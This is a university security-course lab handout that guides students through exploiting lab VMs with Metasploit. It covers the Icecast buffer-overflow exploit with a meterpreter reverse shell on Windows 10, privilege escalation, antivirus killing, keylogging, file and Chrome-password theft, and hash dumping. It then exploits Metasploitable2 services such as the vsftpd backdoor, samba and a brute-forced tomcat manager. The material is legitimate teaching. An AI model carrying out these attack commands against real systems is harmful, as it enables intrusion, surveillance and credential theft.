Lab – Exploitation
See here for instructions on setting up virtualbox for this class.
infosec-netvirtualbox network, as specified at the top of the above link, before importing the vm! It's not the end of the world if you don't, but it does require some extra work.
This lab uses the following vms:
- Windows 10
In this lab you will use Metasploit and the Nessus vulnerability report from the previous lab to exploit and take control of a Windows 10 VM and the Metasploitable VM you scanned in the previous lab.
Metasploit is the industry’s most popular exploitation tool. According to Sectools.org:
Metasploit took the security world by storm when it was released in 2004. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their list of modules. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality.
Metasploit was completely free, but the project was acquired by Rapid7 in 2009 and it soon sprouted commercial variants. The Framework itself is still free and open source, but they now also offer a free-but-limited Community edition, a more advanced Express edition ($3,000 per year per user), and a full-featured Pro edition ($15,000 per user per year). Other paid exploitation tools to consider are Core Impact (more expensive) and Canvas (less).
The Metasploit framework has a variety of different interfaces, including the command line tool
meterpreter, an interface designed to
interact with compromised computers. You can even work from an interactive Ruby programming language interpreter within Metasploit
(Metasploit is written in Ruby). However, the most popular interface, and the one we will use chiefly in this lab, is
Msfconsole is an interactive environment that allows you to scan hosts, test and launch exploits, and build and deploy payloads.
Below is a list of common terminology relating to Metasploit, taken (with some adaptation) from Metasploit: The Penetration Tester’s Guide, by Kennedy et al.
- The means by which an attacker takes advantage of a flaw within a system, an application or service. An exploit results in a particular outcome unintended by the original developer. Common exploits include buffer overflows, web application vulnerabilities (like SQL injection), and configuration errors.
- Code that the attacker wants the system to execute and that is selected and delivered by Metasploit. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a command prompt, whereas a bind shell is a payload that “binds” a command prompt to a listening port on the target machine, to which the attacker can then connect. A payload could also be something as simple as a few commands to be executed on the target operating system.
- A module in the context of Metasploit is a piece of software that can be used by Metasploit. At times, you may require the use of an exploit module, a software component that conducts the attack. Other times, an auxiliary module may be required to perform an action such as scanning or system enumeration. These interchangeable modules are the core of what makes Metasploit so powerful.
- A component within Metasploit that waits for an incoming connection of some kind. For example, after the target machine has been exploited, it may call the attacking machine over the Internet. The listener handles that connection, waiting on the attacking machine to be contacted by the exploited system.
Common Commands within Msfconsole
||Lists available commands.|
||Shows all available exploits in the Metasploit framework. New exploits are constantly being developed and incorporated into the framework.|
||Shows auxiliary modules within Metasploit framework.|
||Searches exploit and auxiliary modules for one or more terms. For those familiar with grep, the search function works the same way.|
||Loads a Metasploit module. The back command exits the module.|
||Exits the current module.|
||Within a particular module, show options displays the required and optional configurations that the module uses.|
||Within a module, show payloads displays all the payloads that are available to use with the module.|
||Within a module, list targets shows OS versions that are vulnerable to the module.|
||Within a module, info shows additional information about the module.|
||Sets an environment variable used as an option specific to a particular module.|
||Sets a global environment variable used as an option that applies across modules.|
||Saves the current global options so they are available the next time you run msfconsole.|
Get the Windows 10 VM ready
Use the Windows 10 vm for this.
Open Windows Defender and turn off real-time protection. To do this:
- Double-click the
disable-defender.ps1script which is on the Desktop.
- Or, manually,
- click the windows button on the bottom left of the desktop and searching for ‘Defender’ and choose ‘Windows Defender Security Center’
- click ‘Virus & Threat protection settings’
- move the ‘Real-time protection’ slider to the left.
- Double-click the
Turn off Windows Firewall. Open CMD with administrative privileges by typing in “cmd” in the Windows search field. Right-click the “Command Prompt” icon, and select “Run as administrator.” Once the command prompt opens, enter the following command:
netsh advfirewall set allprofiles state off
Configure Kali Linux VM
- Boot your Kali VM, and login as user root and password toor.
- open a terminal and try to ping the IP address of the Windows 10 VM.
- Finally, from the Windows 10 VM, ensure that you can ping the Kali VM.
If you are successful in pinging the VMs in both directions, then you are ready to continue the lab. If not, make sure that each VM is connected to the
infosec-net network by checking
ifconfig on Kali and
ipconfig on Windows 10.
Also make sure that the firewall is down on Windows 10.
Start Icecast on Windows 10
Icecast is a media streaming sever that was vulnerable to a buffer overflow attack in versions 2.01 and earlier see the exploit information here. Old versions of Icecast can be found here. For this section of the lab, you will run a vulnerable version of the Icecast server.
- On Windows 10 desktop, right-click the “Icecast2 Win32” icon. Important! Select “Run as administrator,” and click “yes” on the warning message the pops up.
- In the Icecast window, click the button “Start server.”
Metasploit Exploit Walkthrough using the Icecast Vulnerability
- Boot your Kali VM, and login.
Install two additional packages that you need for this lab by running the following commands in a terminal, one line at a time:
apt update apt install mirage xtightvncviewer reboot
Say “yes” to any prompts during the install process.If you do not have an internet connection in Kali, try running
service networking restart. Failing that, restart Kali via running
From the terminal, enter:
service postgresql start
From the terminal, enter:
You should see a “msf >” prompt appear. This is the Metasploit command line.
Scan the Windows 10 VM for vulnerabilities using
nmap -sV <ip of Windows 10>
Notice that Icecast is running on port 8000. Could their be an exploit for Icecast built into Metasploit? Let’s check!
msf >prompt, try:
If the output tells you that you are using "slow search", then cancel with
ctrl+c, and run the following from the
This will allow you to search for Metasploit exploit and auxiliary modules. It will run in the background. It may take some time before the search cache is ready. You can still use "slow search" meanwhile.
Heyo! In the search output, you should see an exploit related to
exploit/windows/http/icecast_header. Use it:
use exploit/windows/http/icecast_headerNote: you can press the tab key within Metasploit to complete a module or command name you are typing. This makes entering commands in Metasploit faster. If you push the tab key twice it will show you all possible options directory you are in.
Your msfconsole prompt should now look like this:
msf exploit(icecast_header) >
Indicating that the
icecast_headermodule is loaded.
To get more information about this exploit module, type
info. This module has been rated “great,” meaning it is very effective and reliable. Besides providing a better description, the
infocommand shows the targets that the module is effective against, as well as options to set.
To show available options, type
Let’s set the required options. First, we’ll set the remote host:
set rhost <IP address of your Windows 10 VM>
show optionsagain to see that the RHOST variable has been set.
Next, let’s look at available payloads for this exploit:
We have a lot of payload options for this module. We’ll use one of the most popular and reliable payloads. Type:
set payload windows/meterpreter/reverse_tcp
Meterpreter is a shell, like Bash, except evil. This payload will open a reverse TCP connection from the exploited Windows 10 VM back to the Kali VM. This is why it is important that you are able to reach Kali from Windows 10, and Windows 10 from Kali.
show optionsagain to see the options that are required for this payload.
To set the local host variable, type
set lhost <IP address of the Kali machine>Note: Remember that you can easily check your IP in Unix/Linux by typing ifconfig from within Metasploit. Type `show options` to see that the variable has been set.
With all options set, now it’s time to launch the exploit!. Type:
run, but that’s less fun.)
You should now be presented with the “meterpreter >” prompt. If you see this, then congratulations! You’ve exploited your first remote host.
Laugh maniacally.Introspective question: How did it feel to laugh maniacally? Do you comprehend the potency of your newfound power? Did anyone overhear you laughing maniacally?Never forget that you are a script kiddie.
Now that we have access, let’s run a few commands to give you an idea of the power of the meterpreter interface.
To see all possible Meterpreter commands, type
sysinfoto see information about the compromised system.
getuidto see the system user you now control.
Because Icecast was “run as administrator”, we can easily become SYSTEM – the Windows equivalent of “root”. Escalate your privileges by typing
getuidagain. You should see that you have “NT AUTHORITY\SYSTEM,” which means you administrator privileges.
Now that you are SYSTEM, laugh again.
With a Meterpreter shell, you have access to a trove of post-exploit modules included in the Metasploit framework that you can run on the victim machine. For instance, type
to stop anti-virus processes that might limit our attacks on the machine.
You can execute commands on the victims host from within Meterpreter. For example, type:
execute -f cmd.exe -c
This will launch cmd.exe on the victim’s machine. You can hide the command window from being shown on the victim machine by using the
-coption “channelizes” the cmd.exe, which means that meterpreter can continue interacting with it. Notice the message that “Channel 1 was created.”
Interact with cmd.exe by typing:
channel -i 1. Use the
cd ..commands to browse around the file system. Type
exitto return to meterpreter.Since opening a command prompt is such a common action, you can simply type
shellto open a hidden command prompt.
screenshotto capture a screenshot of the current GUI. A jpeg file should be saved to
/rooton your Kali machine. You can view the image from a different shell in Kali by navigating to the directory of the stored image and viewing it with
mirage [image name].
Control the Windows GUI.
From meterpreter, type
cntl+z. This sends the current meterpreter session to the background so you can do more things in the Metasploit console.
For this, we will use a different payload – the
set payload windows/vncinject/reverse_tcp
show options. Change the “ViewOnly” option to
set ViewOnly false
A new window will open on Kali Linux that will let you control the Windows VM using the mouse. You are now controlling the Windows user interface! Whatever you do, the logged-in user will see! Trying moving a window on the Windows VM. Then, close the VNC window on the Kali VM. Because you closed the VNC window, the exploit terminated.
Let’s recover your meterpreter shell. Run
sessions -lto view all running connections. You should see your meterpreter session, along with its
Interact with that session again by running
sessions <the id of the session>. Your prompt should change, and you should be engaged with the meterpreter session again.
Start a keylogger on the victim’s computer. Type
keyscan_start. Now, from the Windows 10 machine, open Notepad.exe and type some secrets. They are no longer secrets. Back in meterpreter, type
keyscan_dump. You should see the text you typed in Notepad. To stop the keylogger, type
Steal a file – download a file from Windows 10 to Kali.
Use Notepad to create a text document on the Desktop of the Windows 10 machine. Put more secrets in it.
From the meterpreter session, use the
cdcommand within Meterpreter to navigate to the victim desktop. For that, you can either use the Windows path specification, with double back-slashes:
… or you can use linux path specification:
lsto see what you might pilfer.
Snag the secrets file.
download [filename to steal]
The file should now be pilfered, saved to the Kali VM at
Dog gonnit gotta keep those secrets secret! Name your secrets file something memorable, and hide it somewhere in the Windows filesystem.
The victim’s tricks are no match for meterpreter. Use the
searchcommand from within meterpreter to find the secrets file again:
search -f [name of your secrets file].txt
Annoy the user. First, disable their keyboard and mouse:
uictl disable all
Then, play a video for them. We’ll use the
play_youtubepost module. Read about it from within meterpreter:
From your laptop or whatever, select your favorite annoying youtube video. Note the url of the video – it will include a
v=[video id]in it. Copy the video id. For example, one video id is
DLzxrzFCyOs. Let’s play this video, setting VID to your video. e.g.:
run post/multi/manage/play_youtube VID=DLzxrzFCyOs
Switch over to the Windows VM and enjoy the video. Press
ctrl-wto close it – oh wait you can’t, you disabled keyboard and UI access. Mwahaha. Enjoy the video some more.
From meterpreter, reenable ui controls:
uictl enable allNot for credit but just for fun: Share on slack which annoying video you chose. (remind me to create a slack channel for this if I have not by the time you do this lab.
getsystem‘ed earlier, you can obtain the password hashes for the machine by typing
hashdump. These hashes can be readily cracked using a password cracker like Hashcat or John the Ripper (covered in the password cracking lab). For now, we’ll use Google to crack the password hash for user
Note: hashdump command outputs hashes in the following format:
username:SID:LANMAN hash:<NTLM hash>:::
For example, in the following hashdump, the NTLM hash is
Copy the NTLM hash that you obtain from
labuseruser. Open a web browser, and visit a site like https://crackstation.net, and let it crank on your hash. This site uses a rainbow table.
Alternatively, try to crack it on your own using
-m 1000(NTLM) and a wordlist like rockyou. Go on, it’s fun!Question: What is the NTLM hash of the WDAGUtilityAccount?
(The WDAGUtilityAccount is the account that Windows Defender runs as. Uncrackable, as far as I know.)
Right now, your meterpreter sessions is tied to the Icecast process. This means that if Icecast is closed, you lose your shell. Let’s migitate that threat by migrating to another, more permanent Windows process that is at less risk of being closed down.
ps -S Icecast(note the capital ‘S’ argument and the captial ‘I’ in Icecast) to search for processes with the name of “Icecast.” Note the process ID. Next, type
getpidto get the process that meterpreter is running off of. It should be the same process ID as Icecast. This confirms that you are tied to Icecast.
Now, run this post module, which by default will spawn a hidden
notepad.exeprocess, and migrate you to it:
Now, close the Icecast window. Your meterpreter session should still be running. Persisted.
You may have noticed that web browsers such as Chrome offer to save passwords for you that you enter into websites. Surely those passwords are secure, right? Let’s see!
Question: Take a screenshot of you running the
In the Windows VM, open Chrome and go as if to log in to a website (such as
my.cu.edu). For this exercise, do not use your real credentials. Rather, as the username, enter your First and Last name, and for the password, enter anything excepting your real password. Without actually signing in, click the key symbol to the right of the URL bar, and select “Save.” Chrome has now stashed the password in its “secure” (lol) database. Verify this in Chrome by clicking the three vertical dots in the upper right >
Passwords. See that your password for the site is obfuscated. Click the eye to attempt to view it. It is password-protected! Don’t bother revealing it. Is it secret? Is it safe? Do you feel comfortable right now?
Relaunch the Icecast server, But this time, not as “administrator”. Be sure to press the “start” button again.
Background (or exit) your meterpreter session. This will return you to the msfconsole prompt.
Then, from the
msfconsole, re-select (
use) the Icecast exploit, and
run(i.e., `exploit) it again.
You should now have a new shell tied to the new Icecast process, which is tied to the non-admin-ed Icecast process. To confirm, type
getsystem– it should error out. You’re just a regular labuser.
From within your shiny new inferior non-admin-tied meterpreter session, run the chrome password-snagging post module:
In the output of that command, you should see a line saying
Decrypted data saved in: [directory on your kali machine]. Copy that filepath. Open another Kali terminal, and
catthat file. You should see the Chrome login that you saved.Don't see a "decrypted" line? Double-check to make sure that you actually saved the login to Chrome.Chrome postmod crashing and unable to pull the decrypted file? You need to run this module from a meterpreter session that is tied to a non-admin'ed process (such as a session tied to a Icecast server not started as "admin").
When do I use the
use... set... runpattern versus just
runon its own?
This is an important principle to understand in order to maximize pwnage.
Postmodules can be run from two possible places:
- meterpreter shells (i.e., meterpreter sessions)
The msfconsole is the master, and the meterpreter shells (or whatever shells) are its slaves.
If you want to run a postmodule from a meterpreter session, you use the
runsyntax, with any necessary options specified inline:
run <postmodule path> option1=value1 option2=value2
… like you did with the play_youtube exploit.
With this method, you do not need to set the SESSSION option because the session is implicit when you are running the module from within a meterpreter session – it will always just use that current interacted-with session.
Alternatively, and sometimes more easily, you can run postmodules from msfconsole, over an already-established session. Doing so requires obtaining a session and then backgrounding it to return to msfconsole.
The syntax for this method is more verbose, and is a series of commands instead of a single action-packed one. The pattern is:
use <postmodule> # this arms it set session <sessionid> # this is required when running postmods from msfconsole set <whatever else, such as we set the VID for the youtube exploit> run
This is important to note – when you invoke
runfrom msfconsole, it is equivalent to invoking
exploit. You may not add any additional arguments after saying
run. If you do say anything extra, it is ignored, and the currently-armed exploit (shown in red in the prompt) will be run.
With the second method, msfconsole will run the postmod exploit over your already-established session (assuming that you actually already have one that is still valid)
So, again, there are two ways to run postmodules.
- From within meterpreter (condensed syntax where everything is specified on one line, starting with
- From msfconsole (expanded syntax where multiple commands must be invoked to run one postmodule – e.g.,
shell_to_meterpreterpostmodule for linux boxes, which you will encounter later in this lab, must be run from msfconsole because you cannot run postmodules from a podunk unix shell.
But really, the podunk unix shell isn’t all that bad. You still have access to
downloadextra functions which are easier than
catcommand on the Chrome password loot, including the output of the cat command, showing your login information.
Example screenshot to submit:
Prompt the Windows user for their password. From meterpreter, type:
On Windows, you should see a legitimate Windows prompt, triggered by powershell code run by meterpreter on the victim machine, asking for the user to enter their password. This prompt will not go away until the user enters their correct password (which, for
Password1). Enter the password.
On Kali, in meterpreter, you should see the username and password.
- When you’re finished, type
exitto close the Meterpreter session. Or, type
ctrl+z) if you want to return to it again later.
Part 2: Metasploitable2 Discovery
Start the Metasploitable2 VM.
Do a wide sweep to check which ports are open on the Metasploitable2 VM:
nmap -sS 192.168.55.102
And check versions for common ports:
nmap -sV 192.168.55.102
Versions for all ports:
nmap -sV -p1-65535 192.168.55.102
Versions for one specific port:
nmap -sV -p80 192.168.55.102
Note that the service “vsftpd” is running on part 21. In Kali, from a
msfconsoleprompt, search for a vsftpd exploit:
use) the exploit, and set any necessary options (
show options). Check available payloads:
You will see that a meterpreter shell is not available for this exploit – at least, not initially. Instead you will get a very basic unix shell.
Run the exploit. You will see a final line saying something along the lines of “Command shell session opened…” followed by… nothing. Did the exploit fail? No! You have a shell, albeit a very basic one.
idto see who you are. Type other familiar commands, such as
cat [filename]. You do not have tab-completion, sadly. Although you do have a few basic commands. Run:
Notice that you have
uploadcommands. This can be useful to steal files without having to use
scp. However, you cannot run metasploit postmodules from within this sessions. Let’s fix that by upgrading to a meterpreter session.
- Background your session. This will return you to the msfconsole prompt.
use) the following postmodule:
This command will use our first shell to upload and initiate a meterpreter shell session.
Once you have this postmodule selected, type
show options. Set the needed options, including the session number for the background session. Launch (
run) the post-module. A new meterpreter session should be created. Find the session id of this new sessions (run
sessions), and interact with it (
helpagain. You now have more meta-commands available than before, including accses to postmodules from the shell.
Let’s hashdump metasploitable2. This will give you a list of usernames and password hashes. You can later crack these hashes on Kali.
From your meterpreter session,
This will print all usernames and hashes to the console. It will also save the information to a file in the
/root/.msf4/loot/folder. Make sure you know how to find this file – you can use it to crack hashes in hashcat or john the ripper. View the contents of the file in a separate kali terminal by
cating it.Question: What is the salt and hash for the Postgres user? For example, the salt and hash for the msfadmin user is
You technically do not have to upgrade to a meterpreter session to run the postmodules. You can alternatively run the postmodules using the basic shell session from the msfconsole. to do so, you would select the postmodule as you would an exploit:
use post/linux/gather/hashdump show options set session [sessionid of basic unix shell]
This will execute the postmodule over the basic shell session.
Recall that the general strategy for exploitation requires:
- Service enumeration and version recon
- Exploit identification
If you run
nmap against metasploitable2, you will get a long list of running services. If you include the
-sV flag, you will get some version information.
However, the nmap version probes can only gain so much insight. Some services require you to use other methods to do version recon, such as connecting to the
service using an app that can speak the service protocol (i.e.,
hexchat to connect to the IRC chat client).
You can use what you know about the running service, including its name, to search for exploits. Metasploit’s built-in search functionality is a bit cumbersome and
obtuse, and many prefer to install
exploitdb to get access to the
searchsploit command, which has more intuitive search functionality and nicer reporting and which
includes non-metasploit exploits as well (any available on exploit-db.com). But you should be able to get by with the basic metasploit search functionality
with some trial-and-error and deductive reasoning.
For instance, if
nmap -sV reported that a service called
Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb) was running on port 8787, and you wanted to search
for an exploit for it, you might use the following search in msfconsole:
search ruby drb rmi
This would return a lot of results! Enter
search to see how we might refine our query. The help docs report that we can filter by
type: and also by
the default is to just search by keyword, where the term can appear anywhere in the exploit file).
So, filter down to just exploits:
search ruby drb rmi type:exploit
That’s still a lot of results! A lot of the exploits are written in ruby, so let’s narrow that term to only search the
search name:ruby drb rmi type:exploit
Just two results now. We can work with that. If you googled for what
ruby DRb represents, you would see that the
DRb stands for “distributed”. This would help you pick
which of the two exploits to try first.
And of course, you can always google version names along with the term “exploit” to see what comes up.
Now, exploit three additional services.
Exploit the following additional service
- 1524 | bindshell
- this is a backdoor shell set up on metasploitable, just waiting for a connection…
- easy way, skip metasploit and use
- Read basic docs flex your self-learning muscle!
- metasploit way:
- set payload exploit/multi/handler
- set payload generic/shell_bind_tcp
- set lport 1524
- set rhost 192.168.55.102
Exploit two more additional services from the following list
- 139, 445 | samba
search sambareturns a lot of results! Let’s narrow down
- to get the samba version:
nmap --script smb-os-discovery 192.168.55.102
- now, msf >
search name:samba <version number you got from previous step>
- 1099 | RMIRegistry
- set srvhost to kali host ip on infosec-net
- 3632 | distccd
- 6667 | unrealircd
- to get the precise version number, connect to the IRC server running on metasploitable2.
apt install hexchat
- Networks > Add > (name it whatever) > Edit > replace
- precise version number will be reported by the server in the chat window
- search msf db for an exploit for the server name/version
- to get the precise version number, connect to the IRC server running on metasploitable2.
- 8180 | tomcat
- tomcat is running on port 8180
- view by browsing to 192.168.55.102:8180
- need manager creds 192.168.55.102:8180/manager/html
- bruteforce tomcat manager username:password with auxiliary/scanner/http/tomcat_mgr_login
- once you have the tomcat mgr username:password, exploit (search type:exploit name:tomcat)
- set httpusername and httppassword
- don’t forget to set port
Part 2 Deliverable
For each of the three additional exploits, take one screenshot showing:
- running the exploit and obtaining a shell,
- interacting with that shell (if not done automatically),
- if dropped into a meterpreter session, dropping into a basic shell via the meterpreter
- running the
datecommand (don’t worry about the date being a few days off due to metasploitable2 lagging)
echo <your first and last name>command.
Example – Screenshot 1 out of 3:
...and two more screenshots!